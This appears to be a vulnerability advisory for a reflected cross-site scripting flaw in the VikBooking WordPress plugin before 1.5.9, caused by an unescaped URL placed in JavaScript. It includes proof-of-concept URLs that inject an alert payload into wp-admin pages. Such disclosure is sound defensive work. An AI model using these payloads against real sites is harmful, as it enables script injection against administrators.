Lucene search

K
wpvulndbBrunoModificatoWPVDB-ID:D1E59894-382F-4151-8C4C-5608F3D8AC1F
HistoryMay 03, 2022 - 12:00 a.m.

VikBooking < 1.5.9 - Reflected Cross-Site Scripting

2022-05-0300:00:00
BrunoModificato
wpscan.com
7
vikbooking wordpress plugin cross-site scripting software vulnerability

EPSS

0.001

Percentile

40.2%

The plugin does not escape the current URL before putting it back in a JavaScript context, leading to a Reflected Cross-Site Scripting

PoC

https://example.com/wp-admin/?test"-alert(/XSS/)-" https://example.com/wp-admin/profile.php?test"-alert(/XSS/)-"

EPSS

0.001

Percentile

40.2%

Related for WPVDB-ID:D1E59894-382F-4151-8C4C-5608F3D8AC1F